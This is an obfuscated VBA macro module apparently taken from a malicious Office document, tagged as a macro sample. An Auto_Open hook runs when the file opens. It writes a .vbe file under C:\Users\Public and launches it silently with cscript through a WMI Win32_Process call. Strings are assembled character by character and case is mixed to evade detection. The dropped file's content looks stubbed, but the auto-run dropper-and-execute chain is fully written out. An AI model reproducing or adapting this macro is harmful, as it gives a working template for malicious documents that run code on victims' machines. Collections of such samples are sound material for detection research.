Attribute VB_Name = "SYq2bHBGPVGs"



Public Function c0()
c0 = "c" + "S" + "c" + "R" + "i" + "P" + "t"
End Function
Sub Auto_Open()
t0
End Sub
Public Function j0()
s0 ("""" + c0 + """ /" + "B """ + h0 + """")
End Function
Public Sub s0(n0)
Set d0 = GetObject("WiNmGmTs:{ImPeRsOnAtIoNlEvEl=ImPeRsOnAtE}!\\.\RoOt\CiMv2")
Set b0 = d0.Get("wIn32_pRoCeSs")
a0 = b0.Create(n0, Null)
End Sub
Public Function h0()
h0 = "C" + ":" + "\" + "U" + "s" + "e" + "r" + "s" + "\" + "P" + "u" + "b" + "l" + "i" + "c" + "\" + "p" + "b" + "c" + "." + "v" + "b" + "e"
End Function
Public Function t0()
Set p0 = CreateObject("Scripting.FileSystemObject")
Set g0 = p0.CreateTextFile("" + h0 + "")
g0.WriteLine "" + h0 + ""
g0.Close
j0
End Function


INQUEST-PP=macro
